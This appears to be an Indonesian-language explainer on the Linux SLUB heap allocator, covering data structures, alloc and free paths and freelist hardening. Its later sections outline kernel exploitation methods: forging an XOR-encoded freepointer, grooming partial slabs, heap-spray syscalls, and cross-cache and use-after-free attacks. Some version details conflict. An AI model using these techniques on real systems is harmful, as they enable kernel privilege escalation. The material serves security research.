SLUB Allocator — Architecture Overview
SLUB adalah default kernel heap allocator sejak Linux 2.6.22, menggantikan SLAB.
Dirancang untuk simplicity, per-CPU performance, dan reduced metadata overhead.
Semua alokasi kernel dari beberapa byte hingga beberapa halaman melewati subsystem ini.
Key Data Structures
struct kmem_cache
sizeunsigned int
object_sizeunsigned int
cpu_slab*kmem_cache_cpu
node[]*kmem_cache_node
flagsslab_flags_t
offsetunsigned int
randomunsigned long
struct kmem_cache_cpu
freelistvoid **
tidunsigned long
slab*slab (folio)
partial*slab
struct slab (embedded folio)
freelistvoid *
inuseunsigned int
objectsunsigned int
slab_cache*kmem_cache
frozenunsigned int : 1
struct kmem_cache_node
partiallist_head
nr_partialunsigned long
nr_slabsatomic_long_t
list_lockspinlock_t
01 — kmem_cache_create()
Setiap object type (task_struct, file, inode, dst_entry, dll) punya cache sendiri. Cache dibuat saat boot atau module load. Defines object geometry, alignment, flags, dan per-cpu setup.
/* mm/slab_common.c */ struct kmem_cache *kmem_cache_create( const char *name, unsigned int object_size, unsigned int align, slab_flags_t flags, /* SLAB_HWCACHE_ALIGN | SLAB_PANIC | ... */ void (*ctor)(void *)) { return kmem_cache_create_usercopy(name, object_size, align, flags, 0, 0, NULL); } /* → __kmem_cache_create() → mm/slub.c: kmem_cache_open() */ static int kmem_cache_open(struct kmem_cache *s, slab_flags_t flags) { s->flags = kmem_cache_flags(s->size, flags, s->name); set_min_partial(s, ilog2(s->size) / 2); set_cpu_partial(s); /* cpu_partial threshold */ init_kmem_cache_nodes(s); /* alloc kmem_cache_node per NUMA */ alloc_kmem_cache_cpus(s); /* alloc percpu kmem_cache_cpu */ /* s->offset: freepointer offset di dalam object */ /* s->random: XOR key untuk FREELIST_HARDENED */ /* s->oo: optimal order (slab page order) */ return 0; }
Flags penting untuk security research
F
SLAB_TYPESAFE_BY_RCU UAF-window
Slab page tidak dikembalikan ke buddy setelah semua objek free hingga RCU grace period berlalu. Object memory masih valid dalam rcu_read_lock().
F
SLAB_HWCACHE_ALIGN
Object size di-round-up ke L1 cache line (64 bytes). Padding bytes antara akhir object_size dan size bisa dieksploitasi via adjacent read/write.
F
SLAB_SANITIZE_BY_RCU Linux 6.x
Mitigasi: memory di-zero setelah free (dalam RCU callback). Breaks UAF yang bergantung pada stale data. Diaktifkan di beberapa security-sensitive caches.
F
SLAB_ACCOUNT
Memory-cgroup accounting per object. Tidak berdampak security langsung tapi bisa dipakai untuk oracle (meminfo leak).
Freepointer Layout dalam Object (kunci SLUB)
/* Freepointer disimpan DALAM object itu sendiri, di s->offset */ /* Default: s->offset = 0 (awal object) */ /* Tanpa FREELIST_HARDENED (kernel lama / debug off): */ next_obj = *(void **)((char *)object + s->offset); /* Dengan CONFIG_SLAB_FREELIST_HARDENED (default Linux 5+): */ static inline void *freelist_ptr_decode(const struct kmem_cache *s, void *ptr, unsigned long ptr_addr) { return (void *)((unsigned long)ptr ^ s->random ^ ptr_addr); } /* Stored value = fp XOR s->random XOR &(object->fp_field) */ /* Untuk forge: butuh leak s->random + heap address */
02 — kmem_cache_alloc() / slab_alloc_node()
Dua path: fast (per-CPU freelist, lock-free via cmpxchg_double) dan slow (node partial list atau new slab). Fast path adalah common case untuk cached object types.
Fast Path
Slow Path
Full Source
Fast Path — percpu freelist pop (lock-free)
/* mm/slub.c — slab_alloc_node() fast path */ static inline void *slab_alloc_node(struct kmem_cache *s, gfp_t gfpflags, ...) { struct kmem_cache_cpu *c; unsigned long tid; void *object, *next; redo: c = raw_cpu_ptr(s->cpu_slab); /* this CPU's slab descriptor */ tid = READ_ONCE(c->tid); /* transaction id for preempt detect */ barrier(); /* prevent CPU reordering */ object = READ_ONCE(c->freelist); if (unlikely(!object || !c->slab)) goto slow; /* freelist empty → slow path */ next = get_freepointer_safe(s, object); /* decode XOR freeptr */ /* * Atomic: if (freelist==object && tid==tid) * freelist=next; tid=next_tid(tid); * Jika preempted antara READ_ONCE dan cmpxchg → tid berubah → retry */ if (unlikely(!this_cpu_cmpxchg_double( s->cpu_slab->freelist, s->cpu_slab->tid, object, tid, next, next_tid(tid)))) { note_cmpxchg_failure("slab_alloc", s, tid); goto redo; } return object; /* fast! no lock taken */ slow: return __slab_alloc(s, gfpflags, node, addr, c, orig_size); }
Freelist state — sebelum vs sesudah alloc
Sebelum alloc: cpu_slab->freelist → obj[0] → obj[1] → obj[2] → NULL
freelist
→obj[0]
→obj[0]
obj[0]
fp→[1]
fp→[1]
obj[1]
fp→[2]
fp→[2]
obj[2]
fp→NULL
fp→NULL
obj[3]
IN USE
IN USE
Setelah kmem_cache_alloc(): obj[0] dikembalikan, freelist maju ke obj[1]
freelist
→obj[1]
→obj[1]
obj[0]
ALLOC'd
ALLOC'd
obj[1]
fp→[2]
fp→[2]
obj[2]
fp→NULL
fp→NULL
obj[3]
IN USE
IN USE
Slow Path — __slab_alloc() decision tree
1
Cek c->partial (percpu partial list)
Jika slab aktif habis, ambil slab dari percpu partial list. Tidak butuh lock.
↓
2
Cek node->partial (NUMA node, butuh spin_lock)
Per-CPU partial kosong → ambil dari kmem_cache_node->partial. Slab dipindah ke cpu_slab, partial list diisi ulang.
↓
3
allocate_slab() → alloc_pages() → buddy allocator
Partial kosong semua → alokasi slab baru dari page allocator. Ini yang bisa diprovokasi untuk cross-cache attack.
CONFIG_SLAB_FREELIST_RANDOM
Heap Spray Mitigation
Saat new slab dialokasi, urutan freelist di-Fisher-Yates shuffle via get_random_u32_below(). Random hanya pada slab baru — setelah free/realloc dalam slab yang sama, urutan kembali LIFO (deterministik). Bypass: exhaust partial slabs, paksa new slab allocation, lalu groom partial list.
/* mm/slub.c — full slab_alloc_node() dengan semua guards */ static __always_inline void *slab_alloc_node( struct kmem_cache *s, struct list_lru *lru, gfp_t gfpflags, int node, unsigned long addr, size_t orig_size) { void *object; struct kmem_cache_cpu *c; struct slab *slab; unsigned long tid; struct obj_cgroup *objcg = NULL; bool init = slab_want_init_on_alloc(gfpflags, s); s = slab_pre_alloc_hook(s, lru, &objcg, 1, gfpflags); if (!s) return NULL; redo: c = raw_cpu_ptr(s->cpu_slab); tid = READ_ONCE(c->tid); barrier(); object = READ_ONCE(c->freelist); slab = READ_ONCE(c->slab); if (unlikely(!object || !slab || !node_match(slab, node))) { object = __slab_alloc(s, gfpflags, node, addr, c, orig_size); stat(s, ALLOC_SLOWPATH); } else { void *next = get_freepointer_safe(s, object); if (unlikely(!this_cpu_cmpxchg_double( s->cpu_slab->freelist, s->cpu_slab->tid, object, tid, next, next_tid(tid)))) { note_cmpxchg_failure("slab_alloc", s, tid); goto redo; } prefetchw(object); stat(s, ALLOC_FASTPATH); } if (unlikely(slab_want_init_on_alloc(gfpflags, s)) && object) memset(object, 0, s->object_size); slab_post_alloc_hook(s, objcg, gfpflags, 1, &object, init, orig_size); return object; }
03 — Object Lifetime & Slab State Machine
Setiap slab page traverses state machine yang bergantung pada slab->inuse vs slab->objects. Memahami transisi ini fundamental untuk heap grooming — kita bisa provoking state transitions untuk mengontrol layout.
Object memory layout dalam slab page
/* Layout per-object (SLUB, no debug flags): */ /* */ /* Object offset 0 (saat FREED): */ /* [freepointer/encoded next ptr] ← s->offset bytes from start */ /* [.... user data padding ....] */ /* */ /* Object offset 0 (saat ALLOCATED): */ /* [.... user data ............] ← freeptr di-overwrite saat alloc */ /* */ /* Dengan KASAN: [ user_data | redzone | kasan_meta ] */ /* Dengan DEBUG: [ red_left | user_data | red_right | padding ] */ /* */ /* Freepointer di dalam object = SLUB tidak butuh external metadata */ /* (berbeda dengan dlmalloc yang pakai header/footer per chunk) */ /* virt_to_slab() — dari pointer ke slab descriptor: */ static inline struct slab *virt_to_slab(const void *addr) { struct folio *folio = virt_to_folio(addr); if (!folio_test_slab(folio)) return NULL; return folio_slab(folio); }
inuse counter semantics
/* slab->inuse = jumlah objek yang currently allocated */ /* slab->objects = total objects dalam slab page (capacity) */ /* inuse == 0 → EMPTY, eligible for discard_slab() */ /* 0 < inuse < objs → PARTIAL, masuk partial list */ /* inuse == objects → FULL, keluar dari semua list (unreachable) */ /* */ /* slab->frozen (1 bit): slab sedang "dimiliki" oleh cpu_slab */ /* saat frozen=1: free path butuh cmpxchg, bukan lock */
04 — kfree() / kmem_cache_free()
kfree mengembalikan object ke freelist dengan LIFO prepend. Fast path jika object milik cpu_slab aktif (lock-free cmpxchg). Slow path jika slab lain — bisa trigger partial/full transitions.
/* mm/slub.c — do_slab_free() */ static void do_slab_free(struct kmem_cache *s, struct slab *slab, void *head, void *tail, int cnt, ...) { struct kmem_cache_cpu *c; void *prior; unsigned long tid; redo: c = raw_cpu_ptr(s->cpu_slab); tid = READ_ONCE(c->tid); barrier(); if (likely(slab == READ_ONCE(c->slab))) { /* Fast path: LIFO prepend ke cpu freelist */ prior = c->freelist; set_freepointer(s, tail, prior); /* encode: tail->fp = old_head */ if (unlikely(!this_cpu_cmpxchg_double( s->cpu_slab->freelist, s->cpu_slab->tid, prior, tid, head, next_tid(tid)))) { goto redo; /* preempted, retry */ } } else { __slab_free(s, slab, head, tail, cnt, addr); } } /* __slab_free — slab bukan cpu_slab aktif */ static void __slab_free(struct kmem_cache *s, struct slab *slab, ...) { unsigned long prior, counters, flags; bool was_frozen; struct kmem_cache_node *n; /* cmpxchg slab->freelist: old_fp → head (prepend) */ prior = slab->counters; /* update inuse-- via cmpxchg on counters word */ was_frozen = (prior & SLAB_FROZEN); if (slab->inuse == 0 && !was_frozen) { /* EMPTY: discard atau keep sebagai partial */ if (n->nr_partial > s->min_partial) goto slab_empty; /* → __free_pages() */ add_partial(n, slab, DEACTIVATE_TO_TAIL); } else if (was_full) { /* FULL → PARTIAL: tambah ke node partial list */ add_partial(n, slab, DEACTIVATE_TO_TAIL); } }
LIFO freelist — kfree(obj[1]) visual
Sebelum: freelist → obj[2] → NULL. obj[0] dan obj[1] allocated.
freelist
→obj[2]
→obj[2]
obj[0]
IN USE
IN USE
obj[1]
IN USE
IN USE
obj[2]
fp→NULL
fp→NULL
obj[3]
IN USE
IN USE
Setelah kfree(obj[1]): prepend ke head → LIFO. Next alloc returns obj[1].
freelist
→obj[1]
→obj[1]
obj[0]
IN USE
IN USE
obj[1]
fp→[2]
fp→[2]
obj[2]
fp→NULL
fp→NULL
obj[3]
IN USE
IN USE
LIFO semantics
obj[1] → next alloc
UAF window terbuka sampai re-alloc
05 — Freelist Internals & Manipulation
Freelist adalah singly-linked list of free objects dalam satu slab, dengan pointer tersimpan inline di dalam object. Ini adalah target utama heap exploitation — sama seperti tcache/fastbin di glibc, tapi dengan hardening lebih kuat di kernel modern.
Freepointer Encoding
Shuffle & Bypass
Double Free
/* mm/slub.c — freepointer encode/decode */ /* ENCODE — dipanggil saat set_freepointer(): */ static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp) { unsigned long freeptr_addr = (unsigned long)object + s->offset; #ifdef CONFIG_SLAB_FREELIST_HARDENED BUG_ON(object == fp); /* catch single free immediately */ *(unsigned long *)freeptr_addr = (unsigned long)fp ^ s->random ^ freeptr_addr; /* triple XOR: target_fp ^ cache_secret ^ own_addr */ #else *(void **)freeptr_addr = fp; /* no protection */ #endif } /* DECODE — get_freepointer(): */ static inline void *get_freepointer(struct kmem_cache *s, void *object) { unsigned long ptr_addr = (unsigned long)object + s->offset; return (void *)(READ_ONCE(*(unsigned long *)ptr_addr) ^ s->random ^ ptr_addr); } /* BYPASS strategy (jika s->random + heap addr ter-leak): */ forged_stored_val = (desired_alloc_target) ^ s->random /* leak dari kmem_cache struct */ ^ freeptr_addr; /* = object_addr + s->offset */ /* OOB-write forged_stored_val ke freepointer slot of free object */ /* alloc 1: returns free_object (normal) */ /* alloc 2: returns desired_alloc_target ← arbitrary write prim */
/* mm/slub.c — shuffle_freelist() saat new slab dibuat */ static void shuffle_freelist(struct kmem_cache *s, struct slab *slab) { unsigned int i, n = slab->objects; void **cur, **p; /* Build pointer array, Fisher-Yates shuffle */ for (i = n - 1; i > 0; i--) { j = get_random_u32_below(i + 1); swap(p[i], p[j]); } /* Freelist order random PER slab baru */ /* TAPI: setelah free/alloc dalam slab yg sama → LIFO */ /* Hanya slab baru yang di-shuffle, bukan setelah reuse */ } /* BYPASS FREELIST_RANDOM — partial slab grooming: */ /* 1. Exhaust semua free slots di existing partial slabs */ spray = kmem_cache_alloc_bulk(cache, GFP_KERNEL, n, objs); /* 2. Free beberapa → buat partial slab yang kita kontrol */ for (i = 0; i < n; i += 2) kmem_cache_free(cache, objs[i]); /* LIFO: last-freed = head */ /* 3. Next alloc returns last-freed (LIFO, deterministic) */ victim = kmem_cache_alloc(cache, GFP_KERNEL); /* victim == objs[n-2] → predictable! */
Spray Primitives yang berguna
msgsnd() — body masuk kmalloc-{size}, payload arbitrary
sendmsg() + SCM_RIGHTS — sock_fprog allocation
pipe buffer — pipe_buffer struct (write-then-read)
userfaultfd — blocking alloc, controlled timing
setxattr/getxattr — arbitrary kmalloc size + content
sendmsg() + SCM_RIGHTS — sock_fprog allocation
pipe buffer — pipe_buffer struct (write-then-read)
userfaultfd — blocking alloc, controlled timing
setxattr/getxattr — arbitrary kmalloc size + content
/* Double free detection mechanisms: */ /* 1. FREELIST_HARDENED — BUG_ON(object == fp): */ /* Hanya catch jika free object ke slab yang masih cpu_slab */ /* dan object == current freelist head */ /* TIDAK catch semua double-free cases */ /* 2. KASAN (Kernel Address Sanitizer): */ void kasan_slab_free(struct kmem_cache *cache, void *object, ...) { /* Set shadow bytes KASAN_SLAB_FREE */ /* Saat kfree kedua: shadow check → BUG() */ if (kasan_report_invalid_free(object, ip, KASAN_REPORT_DOUBLE_FREE)) BUG(); } /* 3. Tanpa KASAN/HARDENED (production kernel non-debug): */ /* Double free silently corrupts freelist */ /* obj → obj → obj (cycle) → infinite loop saat alloc */ /* ATAU: attacker-controlled jika fp ditulis sebelumnya */ /* 4. INIT_ON_FREE (Linux 5.3+, CONFIG_INIT_ON_FREE_DEFAULT_ON): */ /* Zero object setelah free → hancurkan stale data */ /* Tapi: freepointer di-set SETELAH zeroing (masih valid) */ memset(object, 0, s->object_size); set_freepointer(s, object, fp); /* tulis fp setelah zero */
06 — Exploitation Primitives via SLUB
Setiap vulnerability class mengeksploitasi aspek berbeda dari allocator lifecycle. Klik setiap teknik untuk melihat PoC pattern dan konteks mitigasi.
1
Use-After-Free (UAF) Reallocation Attack UAF
Object di-free tapi stale pointer masih accessible. Window antara kfree dan re-alloc dieksploitasi dengan heap spray — paksa alloc object lain ke slot yang sama.
2
Heap Spray & Grooming Heap Spray
Mengontrol layout heap agar victim object bersebelahan atau overlap dengan attacker-controlled data. Fundamental untuk semua eksploitasi kernel modern.
3
Cross-Cache Attack (Slab Page Reuse) Cross-Cache
Memaksa slab page dari cache A dikembalikan ke buddy, lalu di-realokasi sebagai slab baru untuk cache B. Relevan dengan crash bpf_prog_test_run_skb() yang ditemukan — slab cross-cache confusion (CWE-763).
4
Freepointer Overwrite (tcache poisoning analog) OOB Write
OOB write ke freelist pointer dalam free object → next allocation returns arbitrary address. Setara dengan tcache poisoning di glibc/ptmalloc.
Linux 6.x Mitigations Overview
INIT_ON_ALLOC / INIT_ON_FREE
Zero object saat alloc (breaks stale data read UAF) dan/atau saat free (breaks UAF data leak). Bisa dimatikan per-call dengan __GFP_SKIP_ZERO.
SLAB_FREELIST_HARDENED
XOR triple encode freepointer. Requires s->random leak + heap leak untuk forge valid pointer. Default ON sejak Linux 4.8.
SLAB_FREELIST_RANDOM
Fisher-Yates shuffle saat new slab creation. Mitigates sequential spray prediction. Bypass: groom partial list sehingga LIFO order predictable.
KASAN / KMSAN / CFI
KASAN: runtime UAF/OOB detection via shadow bytes. KMSAN: uninit read. CFI (clang): validates indirect call targets. Performance overhead signifikan.
SLAB_SANITIZE_BY_RCU (v6.x)
Zero object dalam RCU callback sebelum re-allocation. Combines dengan TYPESAFE_BY_RCU untuk layered UAF protection.
Generic KASLR + FG-KASLR
Randomize kernel text + per-function granularity (FG-KASLR). Meningkatkan cost leak primitive. kmem_cache struct pun di-randomize layoutnya.
/*
Reference: mm/slub.c, mm/slab_common.c — Linux 6.x kernel source
bluedragonsec.com | w1sdom | CVE research: CVE-2026-23416, CVE-2026-30658, CVE-2026-27831 */
bluedragonsec.com | w1sdom | CVE research: CVE-2026-23416, CVE-2026-30658, CVE-2026-27831 */